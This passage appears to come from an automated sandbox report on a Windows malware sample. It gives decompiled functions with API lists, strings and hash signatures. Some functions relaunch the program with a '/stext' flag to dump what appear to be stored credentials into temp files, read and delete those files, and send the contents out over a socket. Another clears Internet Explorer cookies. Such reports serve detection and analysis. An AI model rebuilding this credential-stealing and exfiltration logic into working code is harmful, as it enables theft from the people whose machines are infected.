				char _v60;
				char _v84;
				char _v108;
				char _v132;
				char _v156;
				char _v180;
				char _v204;
				char _v228;
				char _v252;
				char _v276;
				char _v300;
				char _v324;
				char _v348;
				char _v372;
				char _v396;
				char _v420;
				char _v444;
				char _v468;
				short _v988;
				void* __ebx;
				void* __edi;
				void* _t173;
				void* _t199;
				void* _t225;
				void* _t226;
				void* _t394;
				void* _t399;
				void* _t402;
				void* _t405;

				_t405 = __eflags;
				_v12 = 0;
				GetModuleFileNameW(0,  &_v988, 0x104);
				_v5 = 0;
				_v6 = 0;
				E004020D5(0,  &_v300);
				E004020D5(0,  &_v276);
				E004020D5(0,  &_v252);
				E0041800F( &_v228, 0x30, L00401F95(E00417093( &_v36)));
				L00401FC7();
				E0041800F( &_v204, 0x30, L00401F95(E00417093( &_v36)));
				L00401FC7();
				E0041800F( &_v180, 0x30, L00401F95(E00417093( &_v36)));
				L00401FC7();
				L00401F95( &_a52);
				_t393 = L" /stext \"";
				_t224 = E0041432B(L00401EEB(E004030A6(0,  &_v396, E00404429(0,  &_v420, E00404405(0,  &_v444,  &_v988, _t405, E0040427F(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\"")));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401F95( &_a76);
				_t225 = E0041432B(L00401EEB(E004030A6(_t224,  &_v324, E00404429(_t137,  &_v348, E00404405(_t137,  &_v372,  &_v988, _t405, E0040427F(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\"")));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401F95( &_a100);
				_v7 = E0041432B(L00401EEB(E004030A6(_t225,  &_v84, E00404429(_t225,  &_v108, E00404405(_t225,  &_v132,  &_v988, _t405, E0040427F(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\"")));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t399 =  ==  ? 1 : 0;
				if(_t225 == 0) {
					_t399 = _t399 + 1;
				}
				if(_v7 == 0) {
					_t399 = _t399 + 1;
				}
				_t226 = DeleteFileW;
				_t394 = 0;
				L5:
				L5:
				if(L004179DC(L00401EEB( &_v228),  &_v300) != 0) {
					_v12 = 1;
					DeleteFileW(L00401EEB( &_v228));
				}
				if(L004179DC(L00401EEB( &_v204),  &_v276) != 0) {
					_v5 = 1;
					DeleteFileW(L00401EEB( &_v204));
				}
				if(L004179DC(L00401EEB( &_v180),  &_v252) != 0) {
					_v6 = 1;
					DeleteFileW(L00401EEB( &_v180));
				}
				if(_v12 == 0 || _v5 == 0 || _v6 == 0) {
					goto L14;
				}
				L15:
				_t173 = L00405A6F("0");
				_t418 = _t173;
				if(_t173 == 0) {
					L00402F93(_t226, _t402 - 0x18, L00402F93(_t226,  &_v156, L00402F93(_t226,  &_v132, L00402F93(_t226,  &_v108, L00402F93(_t226,  &_v84, L00402FB7( &_v60,  &_a28, 0x46c238), __eflags,  &_v300), __eflags, 0x46c238), __eflags,  &_v276), __eflags, 0x46c238), __eflags,  &_v252);
					_push(0x6a);
					L00404AA4(_t226, 0x46c650, _t180, __eflags);
					L00401FC7();
					L00401FC7();
					L00401FC7();
					L00401FC7();
				} else {
					_t199 = E00417226(_t226,  &_v324, _t399);
					L00402F1D(_t402 - 0x18, L00402F93(_t226,  &_v156, L00402F93(_t226,  &_v132, L00402F93(_t226,  &_v108, L00402F93(_t226,  &_v84, L00402F93(_t226,  &_v60, L00402F93(_t226,  &_v372, L00402FB7( &_v348,  &_a28, 0x46c238), _t418,  &_v300), _t418, 0x46c238), _t418,  &_v276), _t418, 0x46c238), _t418,  &_v252), _t418, 0x46c238), _t199);
					_push(0x69);
					L00404AA4(_t226, 0x46c650, _t207, _t418);
					L00401FC7();
					L00401FC7();
					L00401FC7();
					L00401FC7();
					L00401FC7();
					L00401FC7();
					L00401FC7();
				}
				L00401FC7();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401FC7();
				L00401FC7();
				L00401FC7();
				L00401FC7();
				L00401FC7();
				L00401FC7();
				L00401FC7();
				return L00401FC7();
				L14:
				Sleep(0x1f4);
				_t394 = _t394 + 1;
				if(_t394 < 0xa) {
					goto L5;
				}
				goto L15;
			}





































                                    0x00410305
                                    0x00410320
                                    0x00410323
                                    0x0041032f
                                    0x00410332
                                    0x00410335
                                    0x00410340
                                    0x0041034b
                                    0x00410368
                                    0x00410371
                                    0x0041038e
                                    0x00410397
                                    0x004103b4
                                    0x004103bd
                                    0x004103c5
                                    0x004103dd
                                    0x00410428
                                    0x00410430
                                    0x0041043b
                                    0x00410446
                                    0x00410451
                                    0x00410459
                                    0x004104ba
                                    0x004104bc
                                    0x004104c7
                                    0x004104d2
                                    0x004104da
                                    0x004104e2
                                    0x0041053a
                                    0x0041053d
                                    0x00410545
                                    0x0041054d
                                    0x00410558
                                    0x00410566
                                    0x0041056b
                                    0x0041056d
                                    0x0041056d
                                    0x00410571
                                    0x00410573
                                    0x00410573
                                    0x00410574
                                    0x0041057a
                                    0x00000000
                                    0x0041057c
                                    0x00410596
                                    0x0041059e
                                    0x004105a8
                                    0x004105a8
                                    0x004105c4
                                    0x004105cc
                                    0x004105d6
                                    0x004105d6
                                    0x004105f2
                                    0x004105fa
                                    0x00410604
                                    0x00410604
                                    0x0041060a
                                    0x00000000
                                    0x00000000
                                    0x0041062d
                                    0x00410635
                                    0x0041063a
                                    0x0041063c
                                    0x0041078d
                                    0x00410793
                                    0x0041079a
                                    0x004107a5
                                    0x004107ad
                                    0x004107b5
                                    0x004107bd
                                    0x00410642
                                    0x0041064a
                                    0x004106ce
                                    0x004106d4
                                    0x004106db
                                    0x004106e6
                                    0x004106ee
                                    0x004106f6
                                    0x004106fe
                                    0x00410706
                                    0x00410711
                                    0x0041071c
                                    0x00410721
                                    0x004107c5
                                    0x004107d0
                                    0x004107db
                                    0x004107e6
                                    0x004107f1
                                    0x004107fc
                                    0x00410807
                                    0x0041080f
                                    0x00410817
                                    0x0041081f
                                    0x00410827
                                    0x0041083a
                                    0x00410618
                                    0x0041061d
                                    0x00410623
                                    0x00410627
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323
                                      • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,76D7FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(004041F6,?,004041F6,0045F464), ref: 00414341
                                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(0045F464,?,004041F6,0045F464), ref: 0041434A
                                    • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
                                    • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105D6
                                    • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 00410604
                                    • Sleep.KERNEL32(000001F4,0045F464,0045F464,0045F464), ref: 0041061D
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                                    • String ID: /stext "
                                    • API String ID: 1351907930-3856184850
                                    • Opcode ID: 7f364b6bc4c442b28ae900f15efb8b9cafff702cbe6493c4fbee87e885f413c0
                                    • Instruction ID: c6d11188fe555bf6b2f514a85e60615a11b65789dd85123b9d7458d5680bae53
                                    • Opcode Fuzzy Hash: 7f364b6bc4c442b28ae900f15efb8b9cafff702cbe6493c4fbee87e885f413c0
                                    • Instruction Fuzzy Hash: DDD15C319102595BCB19FB61DC91AEDB375AF54308F4041BFA40AB71E2EF785E89CE48
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A409, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E0040A409(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;

				_t42 =  &_v28;
				E004020D5(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E004108E2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t62 = _t61 + 0xc;
				L00401FD1( &_v28, 0x80000001, _t59, _t17);
				L00401FC7();
				_t58 = 0x45f6bc;
				_t20 = L00405A6F(0x45f6bc);
				_t66 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(L00401F95( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402084(0,  &_v52,  &_v340);
						_t58 =  &_v52;
						_t34 = L00417754(L00401EEB(E004172DA( &_v76,  &_v52)));
						L00401EF0();
						_t55 =  &_v52;
						L00401FC7();
						__eflags = _t34;
						if(__eflags == 0) {
							_push(_t55);
							_push(_t55);
							__eflags = L0040A713();
							if(__eflags != 0) {
								_t41 = 1;
								E00402084(1, _t62 - 0x18, "\n[IE cookies cleared!]");
								L0040A6EF(1,  &_v52, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t62 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t62 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402084(_t41, _t48);
					L0040A6EF(_t41, _t58, _t66);
					_t41 = 1;
					L8:
				}
				L00401FC7();
				return _t41;
			}





















                                    0x0040a412
                                    0x0040a417
                                    0x0040a41c
                                    0x0040a42f
                                    0x0040a431
                                    0x0040a436
                                    0x0040a43d
                                    0x0040a445
                                    0x0040a44a
                                    0x0040a452
                                    0x0040a457
                                    0x0040a459
                                    0x0040a48b
                                    0x0040a49e
                                    0x0040a4a0
                                    0x00000000
                                    0x0040a4a2
                                    0x0040a4ac
                                    0x0040a4b1
                                    0x0040a4c5
                                    0x0040a4cf
                                    0x0040a4d4
                                    0x0040a4d7
                                    0x0040a4dc
                                    0x0040a4de
                                    0x0040a4ef
                                    0x0040a4f0
                                    0x0040a4f6
                                    0x0040a4f8
                                    0x0040a4fd
                                    0x0040a506
                                    0x0040a50b
                                    0x00000000
                                    0x0040a50b
                                    0x0040a4e0
                                    0x0040a4e3
                                    0x0040a4e5
                                    0x00000000
                                    0x0040a4e5
                                    0x0040a4de
                                    0x0040a45b
                                    0x0040a45b
                                    0x0040a45e
                                    0x0040a460
                                    0x0040a465
                                    0x0040a465
                                    0x0040a46a
                                    0x0040a46f
                                    0x0040a510
                                    0x0040a510
                                    0x0040a516
                                    0x0040a522

                                    APIs
                                      • Part of subcall function 004108E2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410904
                                      • Part of subcall function 004108E2: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410923
                                      • Part of subcall function 004108E2: RegCloseKey.ADVAPI32(?), ref: 0041092C
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A48B
                                    • PathFileExistsA.SHLWAPI(?), ref: 0040A498
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: 518f696caf34a80e50aed5e85b550f5397911344afae7d95c44acabde01ece65
                                    • Instruction ID: 0404135b92c53f53d421c2624bcb9c4f004ba22d2f22d8914b52eea1ab551b62
                                    • Opcode Fuzzy Hash: 518f696caf34a80e50aed5e85b550f5397911344afae7d95c44acabde01ece65
                                    • Instruction Fuzzy Hash: D0218E31A102056ACB14F7F1CC5B9EE7768AF14309F44013EF901B71D3EA799A598A9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004501D3, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 90%
                                    			E004501D3(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E004420AE(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E0043F98C(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E0043A4CE(GetLastError());
								}
							}
							E004401F5(_t40);
							_t14 = _t35;
						} else {
							E0043A4CE(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(L0043A504())) = 0x16;
						L0043695D();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(L0043A504())) = 0x16;
				L0043695D();
				return 0;
			}
















                                    0x004501d8
                                    0x004501dd
                                    0x004501f7
                                    0x004501fa
                                    0x004501fc
                                    0x00450215
                                    0x00450217
                                    0x0045021e
                                    0x00450220
                                    0x00450229
                                    0x0045022a
                                    0x0045022e
                                    0x00450234
                                    0x00450237
                                    0x00450239
                                    0x00450253
                                    0x00450256
                                    0x00450258
                                    0x00450265
                                    0x0045026b
                                    0x0045026d
                                    0x00450281
                                    0x00450283
                                    0x00450287
                                    0x00450287
                                    0x00450288
                                    0x0045026f
                                    0x00450276
                                    0x0045027b
                                    0x0045026d
                                    0x0045028b
                                    0x00450290
                                    0x0045023b
                                    0x00450242
                                    0x00450247
                                    0x00450247
                                    0x004501fe
                                    0x00450203
                                    0x00450209
                                    0x0045020e
                                    0x0045020e
                                    0x00000000
                                    0x00450295
                                    0x004501e4
                                    0x004501ea
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
                                    • Instruction ID: 3e8c339fdf138c944f03ee87ae81e8163027b6b6686a5aa70f35362f2fa299d2
                                    • Opcode Fuzzy Hash: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
                                    • Instruction Fuzzy Hash: B5113D765002157BDB206F729C0D92B7AACDF86762F1046ABFC19C7242DA3CCC05C679
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044917A, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0044917A(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					L00448EC1(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					L00448EC1(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					L00448EC1(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					L00448EC1(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					L00448EC1(_t5, 2);
					E004401F5( *((intOrPtr*)(_t45 + 0xa0)));
					E004401F5( *((intOrPtr*)(_t45 + 0xa4)));
					E004401F5( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					L00448EC1(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					L00448EC1(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					L00448EC1(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					L00448EC1(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					L00448EC1(_t13, 2);
					E004401F5( *((intOrPtr*)(_t45 + 0x154)));
					E004401F5( *((intOrPtr*)(_t45 + 0x158)));
					E004401F5( *((intOrPtr*)(_t45 + 0x15c)));
					return E004401F5( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}





                                    0x00449180
                                    0x00449185
                                    0x0044918e
                                    0x00449193
                                    0x00449199
                                    0x0044919e
                                    0x004491a4
                                    0x004491a9
                                    0x004491af
                                    0x004491b4
                                    0x004491bd
                                    0x004491c8
                                    0x004491d3
                                    0x004491de
                                    0x004491e3
                                    0x004491ec
                                    0x004491f1
                                    0x004491fa
                                    0x00449202
                                    0x0044920b
                                    0x00449210
                                    0x00449219
                                    0x0044921e
                                    0x00449227
                                    0x00449232
                                    0x0044923d
                                    0x00449248
                                    0x00000000
                                    0x00449258
                                    0x0044925d

                                    APIs
                                      • Part of subcall function 00448EC1: _free.LIBCMT ref: 00448EEA
                                    • _free.LIBCMT ref: 004491C8
                                      • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                    • _free.LIBCMT ref: 004491D3
                                    • _free.LIBCMT ref: 004491DE
                                    • _free.LIBCMT ref: 00449232
                                    • _free.LIBCMT ref: 0044923D
                                    • _free.LIBCMT ref: 00449248
                                    • _free.LIBCMT ref: 00449253
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                                    • Instruction ID: d0ac5bec4300d42e5daa1f0178d5914e2472619a840d7a0986f756f09d30ade7
                                    • Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                                    • Instruction Fuzzy Hash: A7115172940B04BAFA20BBB2CC47FCF779CAF00705F50081EB39AA6052DE7EB5244658
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004350B5, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E004350B5(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46a090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = L00431BD8(__eflags,  *0x46a090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = L00431C12(__eflags,  *0x46a090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E0043F348(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									L00431C12(__eflags,  *0x46a090, 0);
								} else {
									__eflags = L00431C12(__eflags,  *0x46a090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E004401F5(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








                                    0x004350bc
                                    0x004350cf
                                    0x004350d6
                                    0x004350d9
                                    0x004350dc
                                    0x004350f5
                                    0x004350f5
                                    0x004350de
                                    0x004350de
                                    0x004350e0
                                    0x004350ea
                                    0x004350f0
                                    0x004350f1
                                    0x004350f3
                                    0x00435103
                                    0x00435107
                                    0x00435109
                                    0x0043511d
                                    0x0043511d
                                    0x00435126
                                    0x0043510b
                                    0x00435119
                                    0x0043511b
                                    0x0043512f
                                    0x00435131
                                    0x00435131
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043511b
                                    0x00435134
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004350f3
                                    0x004350e0
                                    0x0043513c
                                    0x00435146
                                    0x004350be
                                    0x004350c0
                                    0x004350c0

                                    APIs
                                    • GetLastError.KERNEL32(?,?,004350AC,004321F2), ref: 004350C3
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004350D1
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004350EA
                                    • SetLastError.KERNEL32(00000000,?,004350AC,004321F2), ref: 0043513C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 3f66e197c8296636e8c0cb4b5eca29cb01eb5dab6965f0ce3b8c02db1c8883f5
                                    • Instruction ID: a515c6194843fa53ce6413da374b9e5764b9e55810f12d35b037beed10178e82
                                    • Opcode Fuzzy Hash: 3f66e197c8296636e8c0cb4b5eca29cb01eb5dab6965f0ce3b8c02db1c8883f5
                                    • Instruction Fuzzy Hash: EC01F532549B115EEA152E79AC4562B2654DB0D779F20223FF220511F1FE594C11564E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040511B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E0040511B(void* __ecx, void* __edi, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t24 = _t23 - 0x18;
					E00402084(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
					E00402084(_t17, _t24 - 0x18, "[WARNING]");
					L00416C80(_t17, __edi);
				}
				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t22 + 0x54));
				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
				CloseHandle( *(_t22 + 0x58));
				return 1;
			}






                                    0x0040511f
                                    0x00405125
                                    0x00000000
                                    0x00405183
                                    0x0040512b
                                    0x0040512d
                                    0x00405137
                                    0x00405146
                                    0x0040514b
                                    0x00405150
                                    0x00405162
                                    0x00405165
                                    0x00405170
                                    0x00405179
                                    0x00000000

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405159
                                    • SetEvent.KERNEL32(?,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405165
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405170
                                    • CloseHandle.KERNEL32(?,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405179
                                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: Connection KeepAlive disabled$[WARNING]
                                    • API String ID: 2993684571-804309475
                                    • Opcode ID: 76a279513c8000d45bb1d856bce9f14881a2df12ec43bda3983b3d9b034b403d
                                    • Instruction ID: 60a08de37f047c10c4ebd60d286cc91250b6658f2aab9bb1a866a2a778ec74b8
                                    • Opcode Fuzzy Hash: 76a279513c8000d45bb1d856bce9f14881a2df12ec43bda3983b3d9b034b403d
                                    • Instruction Fuzzy Hash: E0F0C272900B407FDB103BB59C0EA7B7B98DB0135AF04057AFD41926E2DAB9D8548B9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043F14E, Relevance: 9.2, APIs: 6, Instructions: 200COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 80%
                                    			E0043F14E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				intOrPtr _t75;
				signed int _t78;
				intOrPtr _t86;
				signed int _t97;
				void* _t99;
				void* _t101;
				void* _t106;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				signed int _t121;
				signed int _t123;
				intOrPtr _t124;
				signed int _t126;
				intOrPtr _t128;
				signed int _t129;
				void* _t133;
				void* _t134;
				void* _t136;

				_t118 = __edx;
				_t95 = __ebx;
				_push(_t99);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t121 = 0;
					_t67 = L0043AE14( &_v8, 0, 0, _a8, 0x7fffffff);
					_t134 = _t133 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t126 = E0043F348(_t99, _v8, 2);
						_pop(_t101);
						__eflags = _t126;
						if(_t126 == 0) {
							L11:
							E004401F5(_t126);
							_t70 = _t121;
							goto L12;
						} else {
							_t67 = L0043AE14(_t121, _t126, _v8, _a8, 0xffffffff);
							_t134 = _t134 + 0x14;
							__eflags = _t67;
							if(_t67 == 0) {
								_t121 = E0043E4D0(_t95, _t101, _t118, _a4, _t126);
								goto L11;
							} else {
								__eflags = _t67 - 0x16;
								if(_t67 == 0x16) {
									goto L13;
								} else {
									__eflags = _t67 - 0x22;
									if(_t67 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t121);
							_push(_t121);
							_push(_t121);
							_push(_t121);
							L0043698A(_t67);
							asm("int3");
							L0042FB60(0x468270, 0x1c);
							_t128 = _a4;
							_t74 = E0043F14E(_t95, _t118, _t121, _t128, _t128, _a8);
							_t106 = _t121;
							_t123 = _t74;
							__eflags = _t123;
							if(_t123 != 0) {
								_t75 = L00441CE2(_t95, _t106, _t118);
								_v40 = _t75;
								_v48 =  *((intOrPtr*)(_t75 + 0x4c));
								_t108 =  *((intOrPtr*)(_t75 + 0x48));
								_v44 =  *((intOrPtr*)(_t75 + 0x48));
								_v32 = 0;
								_t78 = L0043B53B( *((intOrPtr*)(_t75 + 0x48)),  &_v32, 0, 0, _t123, 0,  &_v48);
								_t136 = _t134 + 0x18;
								__eflags = _t78;
								if(_t78 == 0) {
									L22:
									_t97 = E0043F98C(_t108, _v32 + 4);
									__eflags = _t97;
									if(_t97 == 0) {
										goto L15;
									} else {
										_t20 = _t97 + 4; // 0x4
										_v36 = _t20;
										_t108 =  &_v48;
										_t123 = 0;
										_t78 = L0043B53B( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t136 = _t136 + 0x18;
										__eflags = _t78;
										if(_t78 == 0) {
											L29:
											_t124 = _v48;
											E0043F0DD(4);
											_pop(_t110);
											_v8 = _v8 & 0x00000000;
											_t129 = _t128 + _t128;
											_t111 = _t110 | 0xffffffff;
											__eflags =  *(_t124 + 0x24 + _t129 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E004401F5( *(_t124 + 0x24 + _t129 * 8));
													_pop(_t114);
													 *(_t124 + 0x24 + _t129 * 8) =  *(_t124 + 0x24 + _t129 * 8) & 0x00000000;
													_t111 = _t114 | 0xffffffff;
													__eflags = _t111;
												}
											}
											_t86 = _v40;
											__eflags =  *(_t86 + 0x350) & 0x00000002;
											if(( *(_t86 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x46a9a4 & 0x00000001;
												if(( *0x46a9a4 & 0x00000001) == 0) {
													__eflags =  *(_t124 + 0x24 + _t129 * 8);
													if( *(_t124 + 0x24 + _t129 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t111 == 1;
														if(_t111 == 1) {
															E004401F5( *(_t124 + 0x24 + _t129 * 8));
															_t51 = _t124 + 0x24 + _t129 * 8;
